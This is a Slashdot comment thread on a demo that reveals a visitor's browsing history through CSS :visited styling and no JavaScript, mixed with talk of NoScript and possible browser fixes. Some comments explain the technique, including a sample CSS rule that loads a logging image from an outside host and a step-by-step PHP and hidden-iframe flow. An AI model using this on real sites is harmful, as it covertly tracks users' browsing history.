Sniffing Browser History Without Javascript 216
Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
For the Masses (Score:1, Interesting)
Does a car manufacturer have a responsibility to make you drive safe? They make the car and if you're too stupid to learn how to use it properly you'll be weeded out.
Old, sure... (Score:4, Interesting)
... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)
Re:big issue is NoScript (Score:5, Interesting)
This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!
In Soviet Russia, web sites visit you (Score:4, Interesting)
I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via by the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window". Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.
Re:How To Fix Without Breaking CSS (Score:3, Interesting)
IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS and see these style variations and this can expose detection of sites you have visited).
Comment removed (Score:5, Interesting)
Re:For the Masses (Score:4, Interesting)
It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.
If a page has the rule: a:visited { color: red; }
And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');
I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.
The point here is, the solution is not dead simple.
Re:big issue is NoScript (Score:5, Interesting)
On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did [hackademix.net] and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.
Yes, there needs to be a more trustworthy NoScript, but at the same time there also need to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.
I, personally have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.
Re:big issue is NoScript (Score:3, Interesting)
Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.
NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).
Re:Old stuff (Score:1, Interesting)
The simplest partial solution is to make CSS visited links expire after 1 hour to minimize it's effects. Yet still retain the history in your browser for 2 months, so that you can still search it.
Re:Old stuff (Score:3, Interesting)
Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)
I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?
Re:Old stuff (Score:2, Interesting)
moderation undo (sorry for OT)...
Re:Old stuff (Score:3, Interesting)
Oh wait, I think I just got it.
What he's doing is setting your CSS A:visited property to a image URL, which is defined based on your browser session. Something like:
a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 [scansite.com] ); } Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.
So, the flowchart looks like:
1) User visits page
2) PHP script generates session ID for the visit
3) PHP script writes an invisible iframe to the page, which includes
- a link to an Target URL (the URL you're trying to find in the history)
- a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
- a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at
Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.
Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.
Re:Old stuff (Score:3, Interesting)
Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. What ever made me think, in this day and age, that anything I do, on the net or not, is private?
Sorry, not to bash you, just sad commentary.....
Re:Old stuff (Score:3, Interesting)
I for one would be quite happy if browsers disabled the ability to use the :visited pseudoclass in your own CSS, which would kill this one stone dead. It's hard enough getting designers to specify :hover states for links, and practically impossible to get :active states out of them - if they're even needed, which is debatable. Who bothers with :visited states? In anything other than body text, users are unlikely to understand why a certain link looks different anyway. It is occasionally useful to spot that a link embedded in text is one you've already followed, but invariably this is the browser's default styling showing through. Perhaps values of 'inherit' should be allowed, so you can turn off the browser default, but otherwise... pfff! get rid of it.
stopping CSS processing (Score:1, Interesting)
Hmm, so how does one go about turning off CSS processing in a browser?
Re:For the Masses (Score:3, Interesting)
is there really a good need or use for a hidden flag on iframes at all??
I honestly don't know, maybe its one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...
With CSS you can hide anything you want to, in a number of different ways, and there are myriad reasons for wanting to do this. Most ajax sites would look a lot worse if the frames they use to silently load your data in the background were suddenly visible.
Re:Old stuff (Score:5, Interesting)
Re:Old stuff (Score:3, Interesting)
This could be done by browsers without needing any change to the standards, AFAICT.
It can't be done without generating a lot of unnecessary bandwidth, though, and harshing major on dialup users (who are already getting their asses kicked hard enough.)
Simple... (Score:2, Interesting)
Delete it.
That's right. It's perfectly possible to live a fulfilled life without browser history, or cookies for that matter. In fact, I still have my cookies file symlinked to